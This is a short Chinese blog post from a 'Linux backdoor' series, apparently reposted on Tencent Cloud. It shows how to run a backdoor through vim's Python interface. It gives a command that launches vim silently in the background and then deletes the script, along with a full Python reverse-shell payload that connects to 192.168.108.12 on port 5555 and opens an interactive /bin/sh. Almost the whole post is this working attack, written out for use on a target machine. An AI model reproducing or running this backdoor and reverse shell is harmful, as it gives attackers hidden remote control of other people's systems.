vim 后门 | Linux 后门系列
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo.py
查看 Ubuntu 16.04 的 vim 支持情况
反弹shell代码
import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect(("192.168.108.12", 5555));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);
靶机 执行
vim -E -c "py3file 1.py"
物理机 监听5555端口并获取反弹的shell
参考文章:
https://youtu.be/kahNGFF2AU8
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-07-01,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读